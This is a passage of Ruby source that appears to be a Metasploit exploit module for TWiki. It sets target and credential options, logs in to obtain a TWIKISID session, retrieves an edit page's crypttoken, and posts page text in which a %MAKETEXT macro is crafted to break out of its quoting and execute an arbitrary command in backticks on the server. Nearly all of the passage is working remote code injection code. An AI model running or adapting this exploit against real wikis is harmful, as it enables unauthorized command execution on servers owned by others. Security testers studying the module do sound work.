register_options(
[
OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),
OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
], self.class)
end
def do_login(username, password)
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}do/login",
'vars_post' =>
{
'username' => username,
'password' => password
}
})
if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/
return nil
end
session = $1
return session
end
def inject_code(session, code)
vprint_status("Retrieving the crypttoken...")
res = send_request_cgi({
'uri' => "#{@base}do/edit#{@page}",
'cookie' => "TWIKISID=#{session}",
'vars_get' =>
{
'nowysiwyg' => '1'
}
})
if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/
vprint_error("Error retrieving the crypttoken")
return nil
end
crypttoken = $1
vprint_good("crypttoken found: #{crypttoken}")
if session.empty?
if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
session = $1
else
vprint_error("Error using anonymous access")
return nil
end
end
vprint_status("Injecting the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}do/save#{@page}",
'cookie' => "TWIKISID=#{session}",
'vars_post' =>
{
'crypttoken' => crypttoken,
'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
}
})